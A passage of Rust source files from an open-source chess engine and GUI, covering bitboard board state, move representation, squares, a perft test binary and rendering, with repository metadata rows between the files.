}
}
fn undo_en_passant(&mut self, commit: &MoveCommit) {
self.move_piece(commit.m.p, commit.m.to, commit.m.from);
let cap_sq = if commit.m.p.get_color() == Color::White {
Square::try_from(commit.m.to as usize - 8).unwrap()
} else {
Square::try_from(commit.m.to as usize + 8).unwrap()
};
self.add_piece(commit.m.capture.unwrap(), cap_sq);
}
pub fn reset(&mut self) {
*self = BoardConfig::default();
}
pub fn from_fen_str(s: &str) -> Self {
Fen::make_config_from_str(s)
}
pub fn load_fen(&mut self, s: &str) {
*self = Fen::make_config_from_str(s);
}
pub fn get_fen(&self) -> String {
Fen::make_fen_from_config(self)
}
pub fn get_at_sq(&self, sq: Square) -> Option<BoardPiece> {
for piece in BoardPiece::iter() {
if self.bitboards[piece as usize].is_set(sq) {
return Some(piece);
}
}
None
}
pub fn get_active_color(&self) -> Color {
self.active_color
}
pub fn get_can_white_castle_queenside(&self) -> bool {
self.castle_flags.can_white_ooo()
}
pub fn get_can_white_castle_kingside(&self) -> bool {
self.castle_flags.can_white_oo()
}
pub fn get_can_black_castle_queenside(&self) -> bool {
self.castle_flags.can_black_ooo()
}
pub fn get_can_black_castle_kingside(&self) -> bool {
self.castle_flags.can_black_oo()
}
pub fn get_en_passant_target(&self) -> Option<Square> {
self.en_passant_target
}
pub fn get_halfmove_clock(&self) -> u8 {
self.halfmove_clock
}
pub fn get_fullmove_number(&self) -> u8 {
self.fullmove_number
}
pub fn get_bit_board(&self, c: char) -> Option<BitBoard> {
if let Ok(p) = BoardPiece::from_str(&c.to_string()) {
return Some(self.bitboards[p as usize]);
}
None
}
pub fn get_piece_occupancy(&self, p: BoardPiece) -> BitBoard {
self.bitboards[p as usize]
}
pub fn all_occupancy(&self) -> BitBoard {
let mut ret = BitBoard::from(0);
for bb in self.bitboards.iter() {
ret |= *bb;
}
ret
}
pub fn white_occupancy(&self) -> BitBoard {
let mut ret = BitBoard::from(0);
use BoardPiece::*;
ret |= self.bitboards[WhiteRook as usize]
| self.bitboards[WhiteBishop as usize]
| self.bitboards[WhiteKnight as usize]
| self.bitboards[WhiteKing as usize]
| self.bitboards[WhiteQueen as usize]
| self.bitboards[WhitePawn as usize];
ret
}
pub fn black_occupancy(&self) -> BitBoard {
let mut ret = BitBoard::from(0);
use BoardPiece::*;
ret |= self.bitboards[BlackRook as usize]
| self.bitboards[BlackBishop as usize]
| self.bitboards[BlackKnight as usize]
| self.bitboards[BlackKing as usize]
| self.bitboards[BlackQueen as usize]
| self.bitboards[BlackPawn as usize];
ret
}
pub fn get_castle_flags_raw(&self) -> u8 {
self.castle_flags.raw()
}
fn move_piece(&mut self, p: BoardPiece, from: Square, to: Square) {
self.remove_piece(p, from);
self.add_piece(p, to);
}
fn remove_piece(&mut self, p: BoardPiece, from: Square) {
self.remove_from_bitboard(p, from);
update_piece(from, p, &mut self.hash);
}
fn add_piece(&mut self, p: BoardPiece, to: Square) {
self.add_to_bitboard(p, to);
update_piece(to, p, &mut self.hash);
}
fn toggle_active_color(&mut self) {
update_side(self.active_color, &mut self.hash);
self.active_color = !self.active_color;
update_side(self.active_color, &mut self.hash);
}
fn remove_from_bitboard(&mut self, p: BoardPiece, pos: Square) {
*self.bitboards[p as usize] &= !(1 << pos as usize);
}
fn add_to_bitboard(&mut self, p: BoardPiece, pos: Square) {
*self.bitboards[p as usize] |= 1 << pos as usize;
}
}
#[derive(Debug, Default, Clone, Copy)]
pub struct CastleFlags(u8);
impl CastleFlags {
pub fn can_white_oo(&self) -> bool {
self.0 & 1 > 0
}
pub fn set_white_oo(&mut self) {
self.0 |= 1;
}
pub fn unset_white_oo(&mut self) {
self.0 &= !(1);
}
pub fn can_white_ooo(&self) -> bool {
self.0 & (1 << 1) > 0
}
pub fn set_white_ooo(&mut self) {
self.0 |= 1 << 1;
}
pub fn unset_white_ooo(&mut self) {
self.0 &= !(1 << 1);
}
pub fn can_black_oo(&self) -> bool {
self.0 & (1 << 2) > 0
}
pub fn set_black_oo(&mut self) {
self.0 |= 1 << 2;
}
pub fn unset_black_oo(&mut self) {
self.0 &= !(1 << 2);
}
pub fn can_black_ooo(&self) -> bool {
self.0 & (1 << 3) > 0
}
pub fn set_black_ooo(&mut self) {
self.0 |= 1 << 3;
}
pub fn unset_black_ooo(&mut self) {
self.0 &= !(1 << 3);
}
pub fn raw(&self) -> u8 {
self.0
}
}
#[derive(Debug)]
struct NoPieceErr;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/moves.rs | chrs-lib/src/data/moves.rs | use super::piece::BoardPiece;
use super::square::Square;
use super::{BoardConfig, CastleFlags};
use std::fmt::{Debug, Display, Formatter, Result};
use std::ops::{Deref, DerefMut};
#[derive(Clone, Copy, Eq, PartialEq, Debug)]
pub enum CastleType {
KingSide,
QueenSide,
}
#[derive(Debug, PartialEq, Eq, Copy, Clone)]
pub enum MoveType {
Normal,
DoublePush,
EnPassant,
Castle(CastleType),
Promotion(Option<BoardPiece>),
}
#[derive(Debug, Copy, Clone, Eq, PartialEq)]
pub struct Move {
pub from: Square,
pub to: Square,
pub p: BoardPiece,
pub capture: Option<BoardPiece>,
pub move_type: MoveType,
}
impl Default for Move {
fn default() -> Self {
Self {
from: Square::A1,
to: Square::A1,
p: BoardPiece::WhitePawn,
capture: None,
move_type: MoveType::EnPassant,
}
}
}
impl Display for Move {
fn fmt(&self, f: &mut Formatter<'_>) -> Result {
match self.move_type {
MoveType::Promotion(Some(prom)) => write!(f, "{}{}{}", self.from, self.to, prom),
_ => write!(f, "{}{}", self.from, self.to),
}
}
}
impl Move {
pub fn new(
from: Square,
to: Square,
p: BoardPiece,
capture: Option<BoardPiece>,
m: MoveType,
) -> Self {
Self {
from,
to,
p,
capture,
move_type: m,
}
}
pub fn new_prom(
from: Square,
to: Square,
p: BoardPiece,
capture: Option<BoardPiece>,
prom: BoardPiece,
) -> Self {
Self {
from,
to,
p,
capture,
move_type: MoveType::Promotion(Some(prom)),
}
}
pub fn infer(from: Square, to: Square, c: &BoardConfig) -> Self {
use MoveType::*;
let p = c.get_at_sq(from).unwrap();
let mut move_type: MoveType = Normal;
let mut capture = c.get_at_sq(to);
// Castling
if p == BoardPiece::WhiteKing {
if from == Square::E1 && to == Square::G1 {
move_type = Castle(CastleType::KingSide);
} else if from == Square::E1 && to == Square::C1 {
move_type = Castle(CastleType::QueenSide);
}
} else if p == BoardPiece::BlackKing {
if from == Square::E8 && to == Square::G8 {
move_type = Castle(CastleType::KingSide);
} else if from == Square::E8 && to == Square::C8 {
move_type = Castle(CastleType::QueenSide);
}
}
// Pawn: Double Push, En Passant and Promotion
else if p == BoardPiece::WhitePawn {
if to as usize - from as usize == 16 {
move_type = DoublePush;
} else if let Some(t) = c.en_passant_target {
if to == t {
capture = c.get_at_sq(unsafe { std::mem::transmute(t as u8 - 8) });
move_type = EnPassant;
}
}
if to >= Square::A8 {
move_type = Promotion(None);
}
} else if p == BoardPiece::BlackPawn {
if from as usize - to as usize == 16 {
move_type = DoublePush;
} else if let Some(t) = c.en_passant_target {
if to == t {
capture = c.get_at_sq(unsafe { std::mem::transmute(t as u8 + 8) });
move_type = EnPassant;
}
}
if to <= Square::H1 {
move_type = Promotion(None)
}
}
Self {
from,
to,
p,
capture,
move_type,
}
}
pub fn is_prom(&self) -> bool {
if let MoveType::Promotion(_) = self.move_type {
return true;
}
false
}
pub fn is_empty_prom(&self) -> bool {
if let MoveType::Promotion(p) = self.move_type {
return p == None;
}
false
}
pub fn set_prom(&mut self, p: BoardPiece) {
if self.is_prom() {
self.move_type = MoveType::Promotion(Some(p));
}
}
}
#[derive(Debug, Copy, Clone)]
pub struct MoveCommit {
pub m: Move,
pub ep_target: Option<Square>,
pub castledelta: CastleFlags,
}
impl Display for MoveCommit {
fn fmt(&self, f: &mut Formatter<'_>) -> Result {
use MoveType::*;
if self.m.move_type == EnPassant {
return write!(f, "{}{}{}e.p.", self.m.p.utf_str(), self.m.from, self.m.to);
} else if let Some(_) = self.m.capture {
return write!(f, "{}{}x{}", self.m.p.utf_str(), self.m.from, self.m.to);
} else if self.m.move_type == Castle(CastleType::KingSide) {
return write!(f, "0-0");
} else if self.m.move_type == Castle(CastleType::QueenSide) {
return write!(f, "0-0-0");
} else if let Promotion(Some(prom)) = self.m.move_type {
return write!(f, "{}{}", self.m.to, prom.utf_str());
} else {
return write!(f, "{}{}{}", self.m.p.utf_str(), self.m.from, self.m.to);
}
}
}
impl MoveCommit {
pub fn new(m: Move, ep_target: Option<Square>, castledelta: CastleFlags) -> Self {
Self {
m,
ep_target,
castledelta,
}
}
}
#[derive(Debug, Clone)]
pub struct List<T> {
pub list: [Option<T>; 255],
pub counter: u8,
capacity: u8,
}
impl<T: Copy> Default for List<T> {
fn default() -> Self {
List {
list: [None; 255],
counter: 0,
capacity: 255,
}
}
}
impl<T: Copy> List<T> {
pub fn clear(&mut self) {
self.counter = 0;
}
pub fn push(&mut self, m: T) {
if self.counter == self.capacity {
log::error!("MoveHistory is out of capacity");
panic!();
}
self.list[self.counter as usize] = Some(m);
self.counter += 1;
}
pub fn pop(&mut self) -> Option<T> {
if self.counter > 0 {
self.counter -= 1;
}
let r = self.list[self.counter as usize];
self.list[self.counter as usize] = None;
r
}
pub fn get_last(&self) -> Option<T> {
self.list[self.counter as usize]
}
pub fn data(&mut self) -> &mut [Option<T>] {
&mut self.list[..(self.counter as usize)]
}
pub fn len(&self) -> usize {
self.counter as usize
}
pub fn iter(&self) -> impl Iterator<Item = &Option<T>> {
self.list.iter().take(self.counter as usize)
}
}
impl List<Move> {
pub fn has_target_sq(&self, sq: Square) -> bool {
self.list
.iter()
.take(self.counter as usize)
.any(|x| x.unwrap().to == sq)
}
}
pub struct MoveList(pub Vec<Move>);
impl Deref for MoveList {
type Target = Vec<Move>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for MoveList {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl MoveList {
pub fn has_target_sq(&self, sq: Square) -> bool {
self.0.iter().any(|x| x.to == sq)
}
pub fn new() -> Self {
Self(Vec::with_capacity(256))
}
pub fn with_capacity(capacity: usize) -> Self {
Self(Vec::with_capacity(capacity))
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-lib/src/data/square.rs | chrs-lib/src/data/square.rs | use std::convert::{Into, TryFrom};
use strum_macros::{Display, EnumIter, EnumString};
macro_rules! make_enum {
($(#[$meta:meta])* $vis:vis enum $name:ident {
$($(#[$vmeta:meta])* $vname:ident $(= $val:expr)?,)*
}) => {
$(#[$meta])*
$vis enum $name {
$($(#[$vmeta])* $vname $(= $val)?,)*
}
impl TryFrom<usize> for $name {
type Error = SquareFromUsizeErr;
fn try_from(v: usize) -> Result<Self, Self::Error> {
match v {
$(x if x == $name::$vname as usize => Ok($name::$vname),)*
_ => Err(SquareFromUsizeErr(format!("failed to convert {:?} to Square", v))),
}
}
}
}
}
make_enum! {
#[repr(u8)]
#[derive(Ord, PartialOrd, Eq, PartialEq, Debug, Clone, Copy, EnumIter, EnumString, Display)]
#[strum(ascii_case_insensitive, serialize_all = "lowercase")]
pub enum Square {
A1, B1, C1, D1, E1, F1, G1, H1,
A2, B2, C2, D2, E2, F2, G2, H2,
A3, B3, C3, D3, E3, F3, G3, H3,
A4, B4, C4, D4, E4, F4, G4, H4,
A5, B5, C5, D5, E5, F5, G5, H5,
A6, B6, C6, D6, E6, F6, G6, H6,
A7, B7, C7, D7, E7, F7, G7, H7,
A8, B8, C8, D8, E8, F8, G8, H8,
}
}
use Square::*;
#[rustfmt::skip]
const MIRROR: [Square; 64] =
[
A8, B8, C8, D8, E8, F8, G8, H8,
A7, B7, C7, D7, E7, F7, G7, H7,
A6, B6, C6, D6, E6, F6, G6, H6,
A5, B5, C5, D5, E5, F5, G5, H5,
A4, B4, C4, D4, E4, F4, G4, H4,
A3, B3, C3, D3, E3, F3, G3, H3,
A2, B2, C2, D2, E2, F2, G2, H2,
A1, B1, C1, D1, E1, F1, G1, H1,
];
impl TryFrom<(usize, usize)> for Square {
type Error = SquareFromPairErr;
fn try_from(pos: (usize, usize)) -> Result<Self, Self::Error> {
match (pos.1 * 8 + pos.0).try_into() {
Ok(sq) => Ok(sq),
Err(err) => Err(SquareFromPairErr(format!(
"failed to convert {:?} to Square: {}",
pos, err.0
))),
}
}
}
impl Into<(usize, usize)> for Square {
fn into(self) -> (usize, usize) {
let s = self as usize;
(s % 8, s / 8)
}
}
impl Square {
pub const fn mirror(&self) -> Self {
MIRROR[*self as usize]
}
}
#[derive(Debug)]
pub struct SquareFromUsizeErr(String);
#[derive(Debug)]
pub struct SquareFromPairErr(String);
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs-perft/src/main.rs | chrs-perft/src/main.rs | #![allow(warnings, unused)]
use chrs_lib::data::{BoardConfig, BoardPiece, Color, Move, Square};
use chrs_lib::generator::MoveGenerator;
use chrs_lib::zobrist::hash;
use std::env;
use std::str::FromStr;
use std::time::Instant;
fn perft_impl(depth: usize, config: &mut BoardConfig, gen: &MoveGenerator, divide: bool) -> usize {
if depth == 0 {
return 1;
}
let side = config.get_active_color();
let moves = gen.gen_all_moves(side, config, false);
if depth == 1 {
return moves.len();
}
let mut count = 0;
for m in moves.iter() {
let key_scratch = hash(config);
if let Some(commit) = config.make_move(*m) {
let c = perft_impl(depth - 1, config, gen, false);
if divide {
println!("{} {}", commit.m.to_string().to_lowercase(), c);
}
count += c;
config.undo_commit(&commit);
let key_updated = config.get_hash();
assert_eq!(key_scratch, key_updated);
}
}
count
}
fn main() {
let depth = std::env::args()
.nth(1)
.expect("Depth not provided")
.parse()
.unwrap();
let fen = std::env::args().nth(2).expect("Fen not provided");
let moves = std::env::args().nth(3).unwrap_or_default();
let mut config = BoardConfig::from_fen_str(&fen);
let gen = MoveGenerator::default();
if moves != "" {
for i in moves.split(' ').collect::<Vec<&str>>() {
let chars = i.chars();
let from: Square =
Square::from_str(&chars.clone().take(2).collect::<String>()).unwrap();
let to: Square =
Square::from_str(&chars.clone().skip(2).take(2).collect::<String>()).unwrap();
let mut m = Move::infer(from, to, &config);
if m.is_empty_prom() {
let mut p = format!("{}", chars.clone().last().unwrap());
if config.get_active_color() == Color::White {
p = p.to_uppercase();
}
let prom = BoardPiece::from_str(&p).unwrap();
m.set_prom(prom);
}
config.make_move(m);
}
}
let now = Instant::now();
let c = perft_impl(depth, &mut config, &gen, true);
let elapsed = now.elapsed();
println!("\n{}", c);
println!("\nTime Take: {:?}", elapsed);
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/app.rs | chrs/src/app.rs | use crate::board::{events::BoardEvent, Board};
use crate::ui::GuiFramework;
use chrs_lib::ai::{NegaMaxAI, AI};
use chrs_lib::data::{BoardConfig, Color, GameState, MoveList, Square};
use chrs_lib::generator::MoveGenerator;
use log;
use pixels::{Error, Pixels, SurfaceTexture};
use std::cell::RefCell;
use std::rc::Rc;
use winit::dpi::LogicalSize;
use winit::event::Event;
use winit::event_loop::{ControlFlow, EventLoop};
use winit::window::WindowBuilder;
const WIN_WIDTH: u32 = 1280;
const WIN_HEIGHT: u32 = 720;
pub struct App;
impl App {
pub async fn run() {
let event_loop = EventLoop::new();
let builder = WindowBuilder::new();
let window_size = LogicalSize::new(WIN_WIDTH, WIN_HEIGHT);
let window = builder
.with_maximized(true)
.with_title("chess-rs")
.with_inner_size(window_size)
.build(&event_loop)
.unwrap();
let window = Rc::new(window);
#[cfg(target_arch = "wasm32")]
{
use wasm_bindgen::JsCast;
use winit::platform::web::WindowExtWebSys;
// Retrieve current width and height dimensions of browser client window
let get_window_size = || {
let client_window = web_sys::window().unwrap();
LogicalSize::new(
client_window.inner_width().unwrap().as_f64().unwrap(),
client_window.inner_height().unwrap().as_f64().unwrap(),
)
};
let window = Rc::clone(&window);
// Initialize winit window with current dimensions of browser client
window.set_inner_size(get_window_size());
let client_window = web_sys::window().unwrap();
// Attach winit canvas to body element
web_sys::window()
.and_then(|win| win.document())
.and_then(|doc| doc.body())
.and_then(|body| {
body.append_child(&web_sys::Element::from(window.canvas()))
.ok()
})
.expect("couldn't append canvas to document body");
// Listen for resize event on browser client. Adjust winit window dimensions
// on event trigger
let closure =
wasm_bindgen::closure::Closure::wrap(Box::new(move |_e: web_sys::Event| {
let size = get_window_size();
window.set_inner_size(size)
}) as Box<dyn FnMut(_)>);
client_window
.add_event_listener_with_callback("resize", closure.as_ref().unchecked_ref())
.unwrap();
closure.forget();
}
let mut board = Board::default();
let mut config = BoardConfig::default();
// let config = BoardConfig::from_fen_str(
// "r3k2r/p1ppqpb1/bn2pnp1/3PN3/1p2P3/2N2Q1p/PPPBBPPP/R3K2R w KQkq -",
// );
let generator = MoveGenerator::default();
let mut ai = NegaMaxAI::default();
let (mut pixels, mut framework) = {
let window_size = window.inner_size();
let surface_texture =
SurfaceTexture::new(window_size.width, window_size.height, window.as_ref());
let board_size = board.get_draw_area_side();
let pixels = Pixels::new_async(board_size, board_size, surface_texture)
.await
.expect("Pixels Error");
let framework = GuiFramework::new(
&event_loop,
window_size.width,
window_size.height,
window.scale_factor() as f32,
&pixels,
);
(pixels, framework)
};
let mut moves: Option<MoveList> = None;
let mut picked_sq: Option<Square> = None;
event_loop.run(move |event, _, control_flow| {
control_flow.set_poll();
match event {
Event::WindowEvent { event, .. } => {
// Update egui inputs
if !framework.handle_event(&event) {
use winit::event::WindowEvent::*;
match event {
CloseRequested => {
log::info!("The close Button was pressed.");
control_flow.set_exit();
}
Resized(size) => {
if let Err(err) = pixels.resize_surface(size.width, size.height) {
log::error!("Pixels failed to resize error: {}", err);
control_flow.set_exit();
}
framework.resize(size.width, size.height);
}
ScaleFactorChanged {
scale_factor,
new_inner_size: _,
} => {
framework.scale_factor(scale_factor);
}
MouseInput { state, button, .. } => {
let board_event = BoardEvent::MouseInput { state, button };
board.handle_event(board_event, &config);
}
CursorMoved { position, .. } => {
if let Ok(pos) = pixels.window_pos_to_pixel(position.into()) {
let board_event = BoardEvent::CursorMoved { position: pos };
board.handle_event(board_event, &config);
} else {
let board_event = BoardEvent::CursorLeft;
board.handle_event(board_event, &config);
}
}
_ => {}
}
}
}
Event::MainEventsCleared => {
if config.get_state() == GameState::InPlay {
let turn = config.get_active_color();
if turn == Color::Black {
let ai_move = ai.get_best_move(&config, &generator);
if let Some(ai_move) = ai_move {
log::info!("AI response {:?}", ai.get_stats());
config.apply_move(ai_move);
} else {
log::info!("AI did not generate any move");
}
} else {
if let Some(user_move) = board.get_user_move() {
if moves.as_ref().unwrap().has_target_sq(user_move.to) {
if !user_move.is_empty_prom() {
config.apply_move(user_move);
board.clear_user_move();
}
}
}
let sq = board.get_picked_piece();
if sq != picked_sq {
picked_sq = sq;
if let Some(sq) = sq {
let p = config.get_at_sq(sq).unwrap();
moves =
Some(generator.gen_piece_moves(p, sq, &mut config, false));
}
}
}
generator.update_state(&mut config);
}
window.request_redraw();
}
Event::RedrawRequested(_) => {
// Redraw here
board.draw(pixels.frame_mut(), &generator, &config, &moves);
// Prepare egui
framework.prepare(&window, &mut config, &mut ai);
// Render everything together
let render_result = pixels.render_with(|encoder, render_target, context| {
// Render the board texture
context.scaling_renderer.render(encoder, render_target);
// Render egui
framework.render(encoder, render_target, context);
Ok(())
});
if let Err(err) = render_result {
log::error!("pixels.render_with failed: {err}");
*control_flow = ControlFlow::Exit;
return;
}
}
_ => (),
}
});
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/main.rs | chrs/src/main.rs | #![allow(warnings, unused)]
mod app;
mod board;
mod cache;
mod ui;
use app::App;
use pixels::Error;
fn main() {
#[cfg(target_arch = "wasm32")]
{
std::panic::set_hook(Box::new(console_error_panic_hook::hook));
console_log::init_with_level(log::Level::Info).expect("error initializing logger");
wasm_bindgen_futures::spawn_local(App::run());
}
#[cfg(not(target_arch = "wasm32"))]
{
std::env::set_var("RUST_BACKTRACE", "1");
pretty_env_logger::init();
pollster::block_on(App::run());
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/cache.rs | chrs/src/cache.rs | use std::collections::HashMap;
#[derive(Debug)]
pub struct Cache<T: Clone> {
store: HashMap<String, T>,
}
impl<T: Clone> Default for Cache<T> {
fn default() -> Self {
Cache {
store: HashMap::new(),
}
}
}
impl<T: Clone> Cache<T> {
pub fn get(&self, id: &str) -> Option<T> {
if let Some(x) = self.store.get(id) {
log::trace!("Found {} in cache", id);
return Some(x.clone());
};
None
}
pub fn put(&mut self, id: &str, v: &T) {
self.store.insert(id.to_string(), v.clone());
}
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/board/embed.rs | chrs/src/board/embed.rs | use rust_embed::RustEmbed;
#[derive(RustEmbed)]
#[folder = "assets/pieces"]
pub struct SvgSprites;
#[derive(RustEmbed)]
#[folder = "assets/fonts"]
pub struct EmbeddedFonts;
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/board/mod.rs | chrs/src/board/mod.rs | mod embed;
pub mod events;
use crate::cache::Cache;
use chrs_lib::data::{BoardConfig, BoardPiece, Color, GameState, Move, MoveList, Square};
use chrs_lib::generator::MoveGenerator;
use embed::{EmbeddedFonts, SvgSprites};
use events::{BoardEvent, ElementState, MouseButton, MouseState};
use fontdue::{
layout::{CoordinateSystem, HorizontalAlign, Layout, LayoutSettings, TextStyle},
Font,
};
use resvg::{tiny_skia, usvg};
const W_PROM_OPTS: [BoardPiece; 4] = [
BoardPiece::WhiteKnight,
BoardPiece::WhiteBishop,
BoardPiece::WhiteRook,
BoardPiece::WhiteQueen,
];
const B_PROM_OPTS: [BoardPiece; 4] = [
BoardPiece::BlackKnight,
BoardPiece::BlackBishop,
BoardPiece::BlackRook,
BoardPiece::BlackQueen,
];
pub struct Board {
side_length: u32,
ruler_offset: u32,
white_color: [u8; 4],
black_color: [u8; 4],
ruler_color: [u8; 4],
highlight_color: [u8; 4],
red_highlight_color: [u8; 4],
font: Font,
glyph_cache: Cache<usvg::Tree>,
raster_cache: Cache<tiny_skia::Pixmap>,
picked_piece: Option<Square>,
mouse_state: MouseState,
user_move: Option<Move>,
overlay_xywh: (f32, f32, f32, f32),
}
impl Default for Board {
#[rustfmt::skip]
fn default() -> Self {
let font_src = Self::get_font_src();
let font = fontdue::Font::from_bytes(font_src, fontdue::FontSettings::default()).unwrap();
let check_side = 720.0 / 8.0;
let size = 720.0 + 20.0;
Board {
side_length: 720,
ruler_offset: 20,
white_color: [0xe3, 0xc1, 0x6f, 0xff],
black_color: [0xb8, 0x8b, 0x4a, 0xff],
ruler_color: [0xff, 0xff, 0xff, 0xff],
highlight_color: [0x3f, 0x7a, 0xd9, 0x40],
red_highlight_color: [0xff, 0x20, 0x20, 0xff],
font,
glyph_cache: Cache::default(),
raster_cache: Cache::default(),
mouse_state: MouseState::default(),
picked_piece: None,
user_move: None,
overlay_xywh: (size/2.0-2.0*check_side, size/2.0-0.5*check_side, 4.0*check_side, check_side),
}
}
}
impl Board {
pub fn get_user_move(&mut self) -> Option<Move> {
self.user_move
}
pub fn clear_user_move(&mut self) {
self.user_move = None
}
pub fn get_picked_piece(&self) -> Option<Square> {
self.picked_piece
}
fn get_pos_prom_box(&self, pos: &(usize, usize)) -> Option<(usize, usize)> {
let inside = pos.0 > self.overlay_xywh.0 as usize
&& pos.0 < (self.overlay_xywh.0 + self.overlay_xywh.2) as usize
&& pos.1 > self.overlay_xywh.1 as usize
&& pos.1 < (self.overlay_xywh.1 + self.overlay_xywh.3) as usize;
if inside {
let x = pos.0 - self.overlay_xywh.0 as usize;
let y = pos.1 - self.overlay_xywh.1 as usize;
return Some((x, y));
}
None
}
pub fn handle_event(&mut self, e: BoardEvent, config: &BoardConfig) {
self.update_mouse_state(e);
if config.get_state() != GameState::InPlay {
return;
}
if let Some(m) = &self.user_move {
if m.is_empty_prom() {
if self.mouse_state.get_is_left_pressed() {
let pos = self.mouse_state.get_pos();
if let Some((x, _)) = self.get_pos_prom_box(&pos) {
let i = x / self.overlay_xywh.3 as usize;
let prom = match config.get_active_color() {
Color::White => W_PROM_OPTS[i],
Color::Black => B_PROM_OPTS[i],
};
self.user_move = Some(Move::new_prom(m.from, m.to, m.p, m.capture, prom));
} else {
self.clear_user_move();
}
}
return;
}
}
let sq = self.get_sq_from_pointer();
if self.mouse_state.get_is_left_pressed() {
if let None = self.picked_piece {
if let Some(p) = config.get_at_sq(sq) {
if p.get_color() == config.get_active_color() {
self.picked_piece = Some(sq);
}
}
}
}
if !self.mouse_state.get_is_left_pressed() {
if let Some(prev) = self.picked_piece {
self.user_move = Some(Move::infer(prev, sq, config));
self.picked_piece = None;
}
}
if !self.mouse_state.get_is_cursor_in() {
self.picked_piece = None;
}
}
pub fn draw(
&mut self,
frame: &mut [u8],
gen: &MoveGenerator,
config: &BoardConfig,
moves: &Option<MoveList>,
) {
let size = self.get_draw_area_side();
let mut pixmap = tiny_skia::Pixmap::new(size, size).unwrap();
let mut white_paint = tiny_skia::Paint::default();
white_paint.set_color_rgba8(
self.white_color[0],
self.white_color[1],
self.white_color[2],
self.white_color[3],
);
let mut black_paint = tiny_skia::Paint::default();
black_paint.set_color_rgba8(
self.black_color[0],
self.black_color[1],
self.black_color[2],
self.black_color[3],
);
let mut ruler_paint = tiny_skia::Paint::default();
ruler_paint.set_color_rgba8(
self.ruler_color[0],
self.ruler_color[1],
self.ruler_color[2],
self.ruler_color[3],
);
let mut highlight_paint = tiny_skia::Paint::default();
highlight_paint.set_color_rgba8(
self.highlight_color[0],
self.highlight_color[1],
self.highlight_color[2],
self.highlight_color[3],
);
let mut red_highlight_paint = tiny_skia::Paint::default();
red_highlight_paint.set_color_rgba8(
self.red_highlight_color[0],
self.red_highlight_color[1],
self.red_highlight_color[2],
self.red_highlight_color[3],
);
let check_side = self.get_check_side();
let glyph_width = (check_side * 0.75) as u32;
let hline = {
let mut pb = tiny_skia::PathBuilder::new();
pb.line_to(self.ruler_offset as f32, 0.0);
pb.finish().unwrap()
};
let vline = {
let mut pb = tiny_skia::PathBuilder::new();
pb.line_to(0.0, self.ruler_offset as f32);
pb.finish().unwrap()
};
for i in 0..8 {
let stroke = tiny_skia::Stroke::default();
{
// Y-axis
let t1 =
tiny_skia::Transform::from_translate(0.0, (1 + i) as f32 * check_side as f32);
pixmap.stroke_path(&hline, &ruler_paint, &stroke, t1, None);
let t2 = tiny_skia::Transform::from_translate(
self.ruler_offset as f32 * 0.2,
i as f32 * check_side as f32 + check_side * 0.45,
);
self.draw_char(('1' as u8 + (7 - i)) as char, 20.0, t2, &mut pixmap);
}
{
// X-axis
let t1 = tiny_skia::Transform::from_translate(
self.ruler_offset as f32 + i as f32 * check_side as f32,
self.side_length as f32,
);
pixmap.stroke_path(&vline, &ruler_paint, &stroke, t1, None);
let t2 = tiny_skia::Transform::from_translate(
self.ruler_offset as f32 + i as f32 * check_side as f32 + check_side * 0.45,
self.side_length as f32 + self.ruler_offset as f32 * 0.2,
);
self.draw_char(('A' as u8 + i) as char, 17.0, t2, &mut pixmap);
}
}
// Draw the checkboard and all the arrangement of pieces
let rect = tiny_skia::Rect::from_xywh(0.0, 0.0, check_side, check_side).unwrap();
for y in 0..8 {
for x in 0..8 {
let paint = if x % 2 == 0 {
if y % 2 == 0 {
&black_paint
} else {
&white_paint
}
} else {
if y % 2 == 0 {
&white_paint
} else {
&black_paint
}
};
let t = tiny_skia::Transform::from_translate(
x as f32 * check_side + self.ruler_offset as f32,
(7 - y) as f32 * check_side,
);
pixmap.fill_rect(rect, paint, t, None);
if let Some(_) = self.picked_piece {
if moves.is_some()
&& moves
.as_ref()
.unwrap()
.has_target_sq((x, y).try_into().unwrap())
{
pixmap.fill_rect(rect, &highlight_paint, t, None);
}
}
if let Some(picked_sq) = self.picked_piece {
if (x, y) == picked_sq.into() {
continue;
}
}
if let Some(p) = config.get_at_sq((x, y).try_into().unwrap()).to_owned() {
if (p == BoardPiece::WhiteKing || p == BoardPiece::BlackKing)
&& config.is_king_in_check(gen, p.get_color())
{
pixmap.fill_rect(rect, &red_highlight_paint, t, None);
}
let tree = self.get_glyph_tree(&p);
let transform = tiny_skia::Transform::from_translate(
// TODO: Fix magic number
x as f32 * check_side + self.ruler_offset as f32 + check_side / 8.0,
(7 - y) as f32 * check_side + check_side / 8.0,
);
let fit = usvg::FitTo::Width(glyph_width);
